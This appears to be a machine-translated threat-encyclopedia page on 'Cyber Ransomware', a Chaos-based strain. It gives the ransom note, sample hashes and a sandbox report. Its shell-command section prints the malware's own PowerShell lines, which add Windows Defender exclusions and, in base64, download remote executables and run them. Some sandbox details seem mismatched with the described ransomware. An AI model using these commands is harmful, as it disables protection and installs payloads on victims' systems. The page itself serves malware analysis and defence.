Cyber Ransomware

通过Mezo在勒索软件

翻译为：

威胁评分卡

Popularity Rank:	10,078
威胁级别：	100 % (高的)
受感染的计算机：	3,489

初见：	October 15, 2021
最后一次露面：	November 12, 2025
受影响的操作系统：	Windows

名为 Cyber 的恶意程序是勒索软件类型的恶意软件。在被破坏的系统上执行后，它会立即为设备上的所有文件启动加密过程，并在其原始文件名后附加“.Cyber”扩展名。例如，初始名称为“1.doc”的文件在加密后现在将显示为“1.doc.Cyber”。同样，“2.pdf”将变为“2.pdf.Cyber”，依此类推。网络安全研究人员指出，Cyber Ransomware 威胁基于 Chaos 恶意软件变种。

除了文件加密外，Cyber Ransomware 还会更改桌面墙纸并生成名为“read_it.txt”的赎金票据。赎金票据包含针对受害者的说明，负责勒索软件攻击的网络犯罪分子通常要求付款以换取解密密钥以解锁加密文件。

网络勒索软件可以通过加密使许多文件类型无法访问

勒索软件说明表明受害者的重要文件，如数据库、文档和照片，已被加密，只能通过以比特币加密货币支付赎金才能解密。通常会提到赎金金额，并为受害者提供一种在支付之前对有限数量的文件进行解密测试的方法。

该注释通常包含攻击者或其代表的联系信息。然而，有时联系信息可能无效，受害者可能难以与攻击者沟通。此外，勒索软件的墙纸可能会显示相同的消息和赎金金额，但联系方式不同。

在大多数勒索软件攻击中，没有攻击者参与的解密通常是不可能的。即使受害者支付了赎金，他们也可能收不到恢复文件所需的解密密钥或软件。因此，专家强烈建议不要支付赎金，即使联系信息是合法的并且赎金金额似乎可以承受。

必须记住，支付赎金支持犯罪活动，并不能保证加密数据的恢复。受害者应该探索其他选择，例如从备份中恢复文件或寻求安全专家的帮助。

确保保护您的设备和数据免受网络勒索软件等威胁

用户可以实施的保护其设备和数据免受勒索软件攻击的最佳措施涉及主动策略和被动策略的结合。

首先，用户应该对自己的在线活动保持警惕，并采取措施避免成为常见勒索软件感染媒介的受害者，例如网络钓鱼电子邮件或恶意下载。这包括使用强而独特的密码、定期更新软件和操作系统，以及对可疑电子邮件或链接保持谨慎。

其次，用户应采取安全措施，例如使用信誉良好的反恶意软件和启用防火墙来阻止未经授权访问其设备。他们还应该考虑使用端点检测和响应 (EDR) 工具，这有助于实时检测和响应勒索软件攻击。

第三，用户应定期将重要数据备份到外部资源，例如云服务或外部硬盘。这有助于确保即使他们的设备感染了勒索软件，他们仍然可以在不支付赎金的情况下访问他们的数据。

第四，如果发生勒索软件攻击，用户应避免支付赎金，因为这可能无法保证数据的安全恢复，还可能助长进一步的犯罪活动。相反，他们应该寻求安全专家的专业帮助，并考虑向执法部门报告攻击事件。

最后，用户应随时了解最新的勒索软件威胁和不断发展的攻击技术，以保持警惕并做好保护自己免受潜在攻击的准备。

Cyber Ransomware 投放的赎金票据全文如下：

别担心，您可以归还所有文件！

您的所有文件（如文档、照片、数据库和其他重要文件）均已加密

我们给你什么保证？

您可以发送 3 个加密文件，我们免费解密。

您必须按照以下步骤解密您的文件：

1) 写信给我们的邮箱：test@test.com（如果24小时内没有回复，请检查您的垃圾邮件文件夹

或写信给我们这个电子邮件：test2@test.com）

2) 获得比特币（解密需要用比特币支付。

付款后，我们将向您发送解密所有文件的工具。）

Cyber Ransomware视频

提示：把你的声音并观察在全屏模式下的视频。

分析报告

一般信息

Family Name:	Cyber Ransomware
Signature status:	No Signature

Known Samples

MD5: 6ae50bdc7246401c666cd7e1b200d87a

SHA1: ec759c5df1845d1109fe2518380233ae1854850f

文件大小: 1.84 MB, 1839616 bytes

MD5: 92a4a3aa4b40e95e8ca1d015c048246b

SHA1: 443a688cc83423c7511d56b626f85a392e798ac1

文件大小: 5.12 KB, 5120 bytes

MD5: 969c9e50187024581e8943a2d8ed9d2d

SHA1: 57cec27d4e6c7714265cad52f7fd9cf58f68bb82

SHA256: C78A44442518C4EC39EF4E85C331C5CDD25C92FC92A80010C6F6DC3F59B1C42D

文件大小: 4.61 KB, 4608 bytes

MD5: d1657a06fd2a757c43372f77ed433f30

SHA1: 48d0f17e206fdcff74121783989c90117ee411f4

SHA256: 0AFC88FC7DD731CF7D5884C415D5A27DC4FB39EB54DC890257AFEA947FC05725

文件大小: 4.54 MB, 4536320 bytes

Windows Portable Executable Attributes

File doesn't have "Rich" header
File doesn't have debug information
File doesn't have exports table
File doesn't have relocations information
File doesn't have security information
File is 32-bit executable
File is either console or GUI application
File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
File is Native application (NOT .NET application)
File is not packed

IMAGE_FILE_DLL is not set inside PE header (Executable)
IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

File Traits

HighEntropy
No Version Info
x86

Block Information

Total Blocks:	8
Potentially Malicious Blocks:	7
Whitelisted Blocks:	1
Unknown Blocks:	0

Visual Map

x x x x x x x 0

0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

ClipBanker.VA
ClipBanker.VB

Files Modified

File	Attributes
\device\namedpipe\pshost.133968239486036860.2548.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.133973844142271624.5256.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134074942406200962.1348.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
c:\users\user\appdata\local\cheat.dll	Generic Write,Read Attributes
c:\users\user\appdata\local\launcher.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\launcher.ini	Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_16.db	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_idx.db	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_0zdqbhap.r32.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_24snuqhq.oyp.ps1	Generic Write,Read Attributes

c:\users\user\appdata\local\temp\__psscriptpolicytest_al3g5ul4.lob.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_aocz5vmr.rla.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_dv4pkhv1.qlu.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_iqv5olmb.tfb.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ruwcjycv.ppp.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ux1vmtfo.12w.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\album_td_3-8-0_activation.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\father.bat	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\father.bat	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\tmp4351$.tmp	Generic Write,Read Attributes,Delete
c:\users\user\appdata\local\temp\ttrj.exe	Generic Write,Read Attributes
c:\users\user\deployment_test.exe	Generic Write,Read Attributes

Registry Modifications

Key::Value	数据	API Name
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	넜泝Ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey

HKLM\software\microsoft\windows\currentversion\runonce::wextract_cleanup0	rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Vebexpvr\AppData\Local\Temp\IXP000.TMP\"	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	᭖洢Ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	洧Ǜ	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::0	C:\Users\Vebexpvr\AppData\Local\Launcher.exeC:\Users\Vebexpvr\AppData\Local	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::1	Z1敖敢灸牶B 뻯.Vebexpvr	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::0	V1嫬齤灡摰瑡a@ 뻯啮坤嫬齤.穗붽æappdata	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::0	P1嫬齤潬慣l< 뻯嫬齤嫬齥.穘ˑQlocal	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots	ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::nodeslot		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bags\132\shell::sniffedfoldertype	Generic	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots	ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots	ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots	ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	椓嵌Ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	ﻒ⍮味ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475	㴠ȁ龡^8獖}	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey

Windows API Usage

Category	API
Process Manipulation Evasion	NtUnmapViewOfSection
Process Shell Execute	CreateProcess ShellExecute
Syscall Use	ntdll.dll!NtAccessCheck ntdll.dll!NtAccessCheckByType ntdll.dll!NtAddAtomEx ntdll.dll!NtAlertThreadByThreadId ntdll.dll!NtAllocateLocallyUniqueId ntdll.dll!NtAlpcAcceptConnectPort ntdll.dll!NtAlpcConnectPort ntdll.dll!NtAlpcConnectPortEx ntdll.dll!NtAlpcCreatePort ntdll.dll!NtAlpcCreatePortSection Show More ntdll.dll!NtAlpcCreateSectionView ntdll.dll!NtAlpcCreateSecurityContext ntdll.dll!NtAlpcQueryInformation ntdll.dll!NtAlpcSendWaitReceivePort ntdll.dll!NtAlpcSetInformation ntdll.dll!NtApphelpCacheControl ntdll.dll!NtAssociateWaitCompletionPacket ntdll.dll!NtCancelWaitCompletionPacket ntdll.dll!NtClearEvent ntdll.dll!NtClose ntdll.dll!NtCompareSigningLevels ntdll.dll!NtConnectPort ntdll.dll!NtCreateEvent ntdll.dll!NtCreateFile ntdll.dll!NtCreateIoCompletion ntdll.dll!NtCreateKey ntdll.dll!NtCreateMutant ntdll.dll!NtCreatePrivateNamespace ntdll.dll!NtCreateSection ntdll.dll!NtCreateSemaphore ntdll.dll!NtCreateThreadEx ntdll.dll!NtCreateTimer ntdll.dll!NtCreateTimer2 ntdll.dll!NtCreateWaitCompletionPacket ntdll.dll!NtCreateWorkerFactory ntdll.dll!NtDelayExecution ntdll.dll!NtDeleteValueKey ntdll.dll!NtDeviceIoControlFile ntdll.dll!NtDuplicateObject ntdll.dll!NtDuplicateToken ntdll.dll!NtEnumerateKey ntdll.dll!NtEnumerateValueKey ntdll.dll!NtFindAtom ntdll.dll!NtFlushProcessWriteBuffers ntdll.dll!NtFreeVirtualMemory ntdll.dll!NtFsControlFile ntdll.dll!NtGetCachedSigningLevel ntdll.dll!NtGetNlsSectionPtr ntdll.dll!NtImpersonateAnonymousToken ntdll.dll!NtMapViewOfSection ntdll.dll!NtNotifyChangeKey ntdll.dll!NtOpenDirectoryObject ntdll.dll!NtOpenEvent ntdll.dll!NtOpenFile ntdll.dll!NtOpenKey ntdll.dll!NtOpenKeyEx ntdll.dll!NtOpenMutant ntdll.dll!NtOpenProcess ntdll.dll!NtOpenProcessToken ntdll.dll!NtOpenProcessTokenEx ntdll.dll!NtOpenSection ntdll.dll!NtOpenSemaphore ntdll.dll!NtOpenSymbolicLinkObject ntdll.dll!NtOpenThread ntdll.dll!NtOpenThreadToken ntdll.dll!NtOpenThreadTokenEx ntdll.dll!NtProtectVirtualMemory ntdll.dll!NtQueryAttributesFile ntdll.dll!NtQueryDefaultLocale ntdll.dll!NtQueryDirectoryFile ntdll.dll!NtQueryDirectoryFileEx ntdll.dll!NtQueryEvent ntdll.dll!NtQueryFullAttributesFile ntdll.dll!NtQueryInformationFile ntdll.dll!NtQueryInformationJobObject ntdll.dll!NtQueryInformationProcess ntdll.dll!NtQueryInformationThread ntdll.dll!NtQueryInformationToken ntdll.dll!NtQueryKey ntdll.dll!NtQueryLicenseValue ntdll.dll!NtQueryObject ntdll.dll!NtQueryPerformanceCounter ntdll.dll!NtQuerySecurityAttributesToken ntdll.dll!NtQuerySecurityObject ntdll.dll!NtQuerySymbolicLinkObject ntdll.dll!NtQuerySystemInformation ntdll.dll!NtQuerySystemInformationEx ntdll.dll!NtQueryValueKey ntdll.dll!NtQueryVirtualMemory ntdll.dll!NtQueryVolumeInformationFile ntdll.dll!NtQueryWnfStateData ntdll.dll!NtReadFile ntdll.dll!NtReadVirtualMemory ntdll.dll!NtReleaseMutant ntdll.dll!NtReleaseSemaphore ntdll.dll!NtReleaseWorkerFactoryWorker ntdll.dll!NtRequestWaitReplyPort ntdll.dll!NtResumeThread ntdll.dll!NtSetEvent ntdll.dll!NtSetInformationFile 206 additional items are not displayed above.
Anti Debug	IsDebuggerPresent NtQuerySystemInformation
User Data Access	GetUserDefaultLocaleName GetUserName GetUserNameEx GetUserObjectInformation
Encryption Used	BCryptOpenAlgorithmProvider
Other Suspicious	AdjustTokenPrivileges

Shell Command Execution


							open C:\Users\Vebexpvr\AppData\Local\Launcher.exe


							open C:\Users\Vebexpvr\deployment_test.EXE


							cmd.exe /c father.bat


							C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell  -Command "Start-Process -WindowStyle Hidden -FilePath powershell -Verb RunAs -ArgumentList '-NoProfile -Command Add-MpPreference -ExclusionPath \"C:\Users\Vebexpvr\*\"


							open powershell -EncodedCommand "PAAjAHYAYQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQAtAHAAbAB1AGcAaQBuAC4AaQBuAGYAbwAvAHkAYwAuAGUAeABlACcALAAgADwAIwBqAHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAZABzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAdAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwAuAGUAeABlACcAKQApADwAIwBlAGEAdgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBhAGQAbwBiAGUALQBwAGwAdQBnAGkAbgAuAGkAbgBmAG8ALwB5AGMAdgAuAGUAeABlACcALAAgADwAIwBqAHEAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAcQB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGMAdABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwB2AC4AZQB4AGUAJwApACkAPAAjAGkAZgBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAZwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAG0AZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMALgBlAHgAZQAnACkAPAAjAHYAcQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGwAdABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwByAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMAdgAuAGUAeABlACcAKQA8ACMAegB2AHQAIwA+AA=="


									open powershell -EncodedCommand "PAAjAHQAegBsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQBoAGUAbABwAC4AbgBlAHQALwB3AGkAbgA4ADYALgBlAHgAZQAnACwAIAA8ACMAegBhAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGwAZAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHMAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB3AGkAbgA4ADYALgBlAHgAZQAnACkAKQA8ACMAaAB6AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgBjAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAcgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHcAaQBuADgANgAuAGUAeABlACcAKQA8ACMAbgB2AG0AIwA+AA=="


									open powershell -EncodedCommand "PAAjAGsAYwBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAcwBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAZABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAdABlACMAPgA="


									open C:\Users\Qoceadrm\AppData\Local\Temp\Album_TD_3-8-0_Activation.exe


									open C:\Users\Qoceadrm\AppData\Local\Temp\ttrj.exe

Cyber Ransomware

威胁评分卡

EnigmaSoft 威胁记分卡

网络勒索软件可以通过加密使许多文件类型无法访问

确保保护您的设备和数据免受网络勒索软件等威胁

Cyber Ransomware视频

分析报告

一般信息

Known Samples

Known Samples

Windows Portable Executable Attributes

Windows Portable Executable Attributes

File Icons

File Icons

File Traits

Block Information

Block Information

Visual Map

Similar Families

Similar Families

Files Modified

Files Modified

Registry Modifications

Registry Modifications

Windows API Usage

Windows API Usage

Shell Command Execution

Shell Command Execution

提交评论

相关帖子

趋势

最受关注